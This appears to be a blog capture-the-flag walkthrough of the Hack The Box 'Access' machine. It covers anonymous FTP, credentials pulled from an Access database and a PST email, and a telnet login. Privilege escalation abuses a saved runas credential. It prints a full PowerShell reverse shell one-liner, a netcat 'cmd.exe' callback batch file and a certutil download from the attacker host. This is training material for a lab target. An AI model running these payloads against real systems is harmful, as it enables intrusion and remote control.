Pages

Search

HTB Access

$ nmap -A -T4 -p- 10.10.10.98

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-11 10:15 CEST
Nmap scan report for 10.10.10.98
Host is up (0.046s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.76 seconds

Open ports detected:
• 21/tcp open ftp Microsoft ftpd
• 23/tcp open telnet?
• 80/tcp open http Microsoft IIS httpd 7.5

$ ftp 10.10.10.98

Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:ruben): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.

ftp> cd Backups
ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.

ftp> get backup.mdb

local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 1.82 secs (2.9657 MB/s)

ftp> cd ..
ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.

ftp> cd Engineer
ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  01:16AM                10870 Access Control.zip
226 Transfer complete.

ftp> get "Access Control.zip"

local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
10870 bytes received in 0.20 secs (53.5825 kB/s)

Files haven’t been correctly downloaded.
By default, ftp mode set for text files.
We need to download again this files but this time using binary mode enabled.

ftp> cd backups

250 CWD command successful.

ftp> ls

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.

ftp> binary

200 Type set to I.

ftp> get backup.mdb

local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 4.24 secs (1.2725 MB/s)

ftp> cd Engineer
ftp> get "Access Control.zip"

local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10870 bytes received in 0.28 secs (38.4597 kB/s)

$ file backup.mdb

backup.mdb: Microsoft Access Database

The file is a Microsoft Access Database.
To be able to access to the mdb file from our Kali Linux we would need to use mdbtools.

Let’s install it:

https://github.com/mdbtools/mdbtools

$ sudo apt install mdbtools

Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes adicionales:
  libmdb2 libmdbsql2
Paquetes sugeridos:
  mdbtools-doc
Se instalarán los siguientes paquetes NUEVOS:
  libmdb2 libmdbsql2 mdbtools
0 actualizados, 3 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
Se necesita descargar 159 kB de archivos.
Se utilizarán 478 kB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] 
Des:1 http://kali.download/kali kali-rolling/main amd64 libmdb2 amd64 0.7.1-6+b1 [61,9 kB]
Des:2 http://kali.download/kali kali-rolling/main amd64 libmdbsql2 amd64 0.7.1-6+b1 [40,5 kB]
Des:3 http://kali.download/kali kali-rolling/main amd64 mdbtools amd64 0.7.1-6+b1 [56,6 kB]
Descargados 159 kB en 1s (126 kB/s)
Seleccionando el paquete libmdb2:amd64 previamente no seleccionado.
(Leyendo la base de datos ... 321224 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../libmdb2_0.7.1-6+b1_amd64.deb ...
Desempaquetando libmdb2:amd64 (0.7.1-6+b1) ...
Seleccionando el paquete libmdbsql2:amd64 previamente no seleccionado.
Preparando para desempaquetar .../libmdbsql2_0.7.1-6+b1_amd64.deb ...
Desempaquetando libmdbsql2:amd64 (0.7.1-6+b1) ...
Seleccionando el paquete mdbtools previamente no seleccionado.
Preparando para desempaquetar .../mdbtools_0.7.1-6+b1_amd64.deb ...
Desempaquetando mdbtools (0.7.1-6+b1) ...
Configurando libmdb2:amd64 (0.7.1-6+b1) ...
Configurando libmdbsql2:amd64 (0.7.1-6+b1) ...
Configurando mdbtools (0.7.1-6+b1) ...
Procesando disparadores para libc-bin (2.31-2) ...
Procesando disparadores para man-db (2.9.3-2) ...
Procesando disparadores para kali-menu (2020.3.2) ...

Command msb-tables mdb_file.mdb list all tables existing in the database.
This command can be used with grep to colour results of our search.

In this Access database, there are following tables that include “user” in their name.
• auth_user
• auth_user_groups
• auth_user_user_groups_permissions
• userinfo_attarea

Let’s try to export “auth_user” table to see it’s content.

$ sudo mdb-export backup.mdb auth_user

id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

We’ve found 3 credentials:
• admin:admin
• engineer:access4u@security
• backup_admin:admin

If you try to open the file “Access Control.zip”, it will ask for a password.
Use “access4u@security” to extract it.
You’ll get a file called: “Access Control.pst”

We need to use an application to read pst files.

$ sudo apt search readpst

[sudo] password for ruben: 
Ordenando... Hecho
Buscar en todo el texto... Hecho
pst-utils/kali-rolling 0.6.75-1 amd64
  tools for reading Microsoft Outlook PST files

$ sudo apt install pst-utils

Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes adicionales:
  libgsf-1-114 libgsf-1-common libpst4
Paquetes sugeridos:
  mb2md
Se instalarán los siguientes paquetes NUEVOS:
  libgsf-1-114 libgsf-1-common libpst4 pst-utils
0 actualizados, 4 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
Se necesita descargar 472 kB de archivos.
Se utilizarán 1.569 kB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] 
Des:1 http://kali.download/kali kali-rolling/main amd64 libgsf-1-common all 1.14.47-1 [158 kB]
Des:2 http://kali.download/kali kali-rolling/main amd64 libgsf-1-114 amd64 1.14.47-1 [161 kB]
Des:3 http://kali.download/kali kali-rolling/main amd64 libpst4 amd64 0.6.75-1 [77,1 kB]
Des:4 http://kali.download/kali kali-rolling/main amd64 pst-utils amd64 0.6.75-1 [75,4 kB]
Descargados 472 kB en 1s (494 kB/s)  
Seleccionando el paquete libgsf-1-common previamente no seleccionado.
(Leyendo la base de datos ... 321264 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../libgsf-1-common_1.14.47-1_all.deb ...
Desempaquetando libgsf-1-common (1.14.47-1) ...
Seleccionando el paquete libgsf-1-114:amd64 previamente no seleccionado.
Preparando para desempaquetar .../libgsf-1-114_1.14.47-1_amd64.deb ...
Desempaquetando libgsf-1-114:amd64 (1.14.47-1) ...
Seleccionando el paquete libpst4:amd64 previamente no seleccionado.
Preparando para desempaquetar .../libpst4_0.6.75-1_amd64.deb ...
Desempaquetando libpst4:amd64 (0.6.75-1) ...
Seleccionando el paquete pst-utils previamente no seleccionado.
Preparando para desempaquetar .../pst-utils_0.6.75-1_amd64.deb ...
Desempaquetando pst-utils (0.6.75-1) ...
Configurando libgsf-1-common (1.14.47-1) ...
Configurando libgsf-1-114:amd64 (1.14.47-1) ...
Configurando libpst4:amd64 (0.6.75-1) ...
Configurando pst-utils (0.6.75-1) ...
Procesando disparadores para libc-bin (2.31-2) ...
Procesando disparadores para man-db (2.9.3-2) ...
Procesando disparadores para kali-menu (2020.3.2) ...

$ sudo readpst Access\ Control.pst

Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

$ ls

'Access Control.mbox'  'Access Control.pst'  'Access Control.zip'   access.ctb   backup.mdb   results

$ cat "Access Control.mbox"

From "john@megacorp.com" Fri Aug 24 01:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="--boundary-LibPST-iamunique-1692514513_-_-"

----boundary-LibPST-iamunique-1692514513_-_-
Content-Type: multipart/alternative;
	boundary="alt---boundary-LibPST-iamunique-1692514513_-_-"

--alt---boundary-LibPST-iamunique-1692514513_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

...

The message of the email was:

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

So, the “security” account password is “4Cc3ssC0ntr0ller»
security:4Cc3ssC0ntr0ller

$ telnet 10.10.10.98

Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security 
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================

C:\Users\security>dir

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

08/23/2018  11:52 PM    <DIR>          .
08/23/2018  11:52 PM    <DIR>          ..
08/24/2018  08:37 PM    <DIR>          .yawcam
08/21/2018  11:35 PM    <DIR>          Contacts
08/28/2018  07:51 AM    <DIR>          Desktop
08/21/2018  11:35 PM    <DIR>          Documents
08/21/2018  11:35 PM    <DIR>          Downloads
08/21/2018  11:35 PM    <DIR>          Favorites
08/21/2018  11:35 PM    <DIR>          Links
08/21/2018  11:35 PM    <DIR>          Music
08/21/2018  11:35 PM    <DIR>          Pictures
08/21/2018  11:35 PM    <DIR>          Saved Games
08/21/2018  11:35 PM    <DIR>          Searches
08/24/2018  08:39 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  16,771,776,512 bytes free

C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018  07:51 AM    <DIR>          .
08/28/2018  07:51 AM    <DIR>          ..
08/21/2018  11:37 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,771,776,512 bytes free

C:\Users\security\Desktop>type user.txt

ff1fXXXXXXXXXXXXXXXXXXXXXXXXXXXX

As we are currently in a Telnet shell we should try to improve it.

powershell -command "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.13',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

«cmdkey /list» is a command useful that display stored user names and passwords or credentials in a Windows system.

$ nc -lvnp 4444

listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.98] 49157
whoami
access\security
PS C:\Users\security>

PS C:\Users\security> cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator
    
PS C:\Users\security> 

According to this information we have a stored credential for “ACCESS\Administrator” on this system.

One of the possibles reasons to store credentials may be to run an application as administrative permission (with the /savecred option enabled) without need to log in as an administrator.
«runas /savedcred» is usually used to create a shortcut to run the application.

Let’s list then all the shortcut files on the system and check if there are any “runas” string.

Get-ChildItem​ ​-Path "C:\"​ *.lnk -Recurse -Force | ft fullname | ​Out-File​ file.txt
ForEach​ ( $file​ ​ in​ gc .\file.txt) {Write-Output​ ​ $file​ ; gc ​ $file​ | Select-String​ runas }

PS C:\Users\security> Get-ChildItem -Path "C:\" *.lnk -Recurse -Force | ft fullname | Out-File file.txt
PS C:\Users\security> dir

    Directory: C:\Users\security

Mode                LastWriteTime     Length Name                                          
----                -------------     ------ ----                                          
d----         8/24/2018   8:37 PM            .yawcam                                       
d-r--         8/21/2018  11:35 PM            Contacts                                      
d-r--         8/28/2018   7:51 AM            Desktop                                       
d-r--         8/21/2018  11:35 PM            Documents                                     
d-r--         8/21/2018  11:35 PM            Downloads                                     
d-r--         8/21/2018  11:35 PM            Favorites                                     
d-r--         8/21/2018  11:35 PM            Links                                         
d-r--         8/21/2018  11:35 PM            Music                                         
d-r--         8/21/2018  11:35 PM            Pictures                                      
d-r--         8/21/2018  11:35 PM            Saved Games                                   
d-r--         8/21/2018  11:35 PM            Searches                                      
d-r--         8/24/2018   8:39 PM            Videos                                        
-a---         9/29/2020   4:07 PM      25496 file.txt        

PS C:\Users\security> ForEach ($file in gc .\file.txt) {Write-Output $file; gc $file; gc $file | Select-String runas}

FullName                                                                                                          
--------                                                                                                          
C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk                                                  
L?F? kOu?kOu??g?#??????"@%SystemRoot%\system32\sud.dll,-10(..\..\..\..\Windows\System32\control.exe/name Microsoft.DefaultPrograms%windir%\system32\imageres.dll(	?1SPS??XF?L8C???&?m??%windir%\system32\control.exe%windir%\system32\control.exe`?Xaccess?_???8{E?3
                                           O?j;?w??????
                                                       )??[?_???8{E?3
                                                                     O?j;?w??????
                                                                                 )??[
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk                                                    
L?F? ????�?????�?p??#??!@%windir%\system32\wucltux.dll,-2&..\..\..\..\Windows\System32\wuapp.exe%windir%\system32	startmenu%windir%\system32\wucltux.dll(	?1SPS??XF?L8C???&?m??%windir%\system32\wuapp.exe%windir%\system32\wuapp.exe`?Xwin-tmscr5l2foo?n???9W@??b�?r
                                            _:p??T??Y????n???9W@??b�?r
                                                                      _:p??T??Y???
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk                                     
L?F? &N?F?9?&N?F?9???u(??(@%systemroot%\syswow64\unregmp2.exe,-155D..\..\..\..\..\Program Files (x86)\Windows Media Player\wmplayer.exe(%ProgramFiles(x86)%\Windows Media Player
                                                                 /prefetch:15%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe?%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe?	?1SPS??XF?L8C???&?m?m1SPSU(L?y?9K????-???@Microsoft.Windows.MediaPlayer32`?Xaccess?_???8{E?3
     O?j<?w??????
                 )??[?_???8{E?3
                               O?j<?w??????
                                           )??[
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk                                   
L?F? _jx??_jx???e??#?)@%SystemRoot%\system32\shell32.dll,-22531+..\..\..\..\..\..\Windows\System32\calc.exe�%windir%\system32\calc.exe(	?1SPS??XF?L8C???&?m??%windir%\system32\calc.exe%windir%\system32\calc.exe`?Xwin-tmscr5l2foo?n???9W@??b�??
                          _:p??T	?'??n???9W@??b�??
                                                         _:p??T	?'?
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk                                
L?F? ?k?_??k?_? ?W?#????)@%windir%\system32\displayswitch.exe,-3214..\..\..\..\..\..\Windows\System32\DisplaySwitch.exe#%windir%\system32\displayswitch.exe(	?1SPS??XF?L8C???&?m??%windir%\system32\displayswitch.exe%windir%\system32\displayswitch.exe`?Xwin-tmscr5l2foo?n???9W@??b�??
                                                            _:p??T	?'??n???9W@??b�??
                                                                                         _:p??T	?'?
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk                                        
L?F? ?{????{???0 ??#??e)@%SystemRoot%\system32\shell32.dll,-22566...\..\..\..\..\..\Windows\System32\mspaint.exe%windir%\system32\mspaint.exe(	?1SPS??XF?L8C???&?m??%windir%\system32\mspaint.exe%windir%\system32\mspaint.exe`?Xwin-tmscr5l2foo?n???9W@??b�??
                                _:p??T	?'??n???9W@??b�??
                                                         _:p??T	?'?
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk                    
L?F? ?6?l??6?l??]??#??"@%windir%\system32\mstsc.exe,-4001,..\..\..\..\..\..\Windows\System32\mstsc.exe%windir%\system32\indir%\system32\mstsc.exe?%windir%\system32\mstsc.exe%windir%\system32\mstsc.exe?	?1SPS??XF?L8C???&?m?m1SPSU(L?y?9K????-???@Microsoft.Windows.RemoteDesktop`?Xwin-tmscr5l2foo?n???9W@??b�??
                                                                                          _:p??T	?'??n???9W@??b�??
          _:p??T	?'?
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk                                
L?F? B?
       ?B?
          ??0?#??.@%SystemRoot%\System32\SnippingTool.exe,-150523..\..\..\..\..\..\Windows\System32\SnippingTool.exe"%windir%\system32\SnippingTool.exe(	?1SPS??XF?L8C???&?m??%windir%\system32\SnippingTool.exe%windir%\system32\SnippingTool.exe`?Xaccess?_???8{E?3
                                             O?j
                                                ?w??????
                                                        )??[?_???8{E?3
                                                                      O?j
                                                                         ?w??????
                                                                                 )??[
...

If these results are analyzed, you’ll find this entry:

C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk   

There is a ZKAccess shortcut on the Public Desktop configured to use of the «runas /savecred» .

PS C:\Users\Public\Desktop> ls

PS C:\Users\Public\Desktop> ls

    Directory: C:\Users\Public\Desktop

Mode                LastWriteTime     Length Name                                            
----                -------------     ------ ----                                            
-a---         8/22/2018  10:18 PM       1870 ZKAccess3.5 Security System.lnk 

So, as there is no way in Windows to restrict the use of the «runas /savecred» privilege to a single application (once we’ve found this .lnk file), runas can be used to run any command with elevated privileges.

To exploit this vulnerability we’ll need to create a new file:

shell.bat :

c:\users\security\nc.exe -e cmd.exe 10.10.14.13 5555

Transfer this file to the target:

PS C:\Users\security> certutil.exe -urlcache -split -f http://10.10.14.13:8080/shell.bat shell.bat

****  Online  ****
  0000  ...
  0037
CertUtil: -URLCache command completed successfully.

$ nc -lnvp 5555
PS C:\Users\security> runas /user:ACCESS\Administrator /savedcred "c:\users\security\shell.bat"

listening on [any] 5555 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.98] 49172
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>

C:\Windows\system32>whoami

access\administrator

C:\Users\Administrator\Desktop>type root.txt

6e15XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *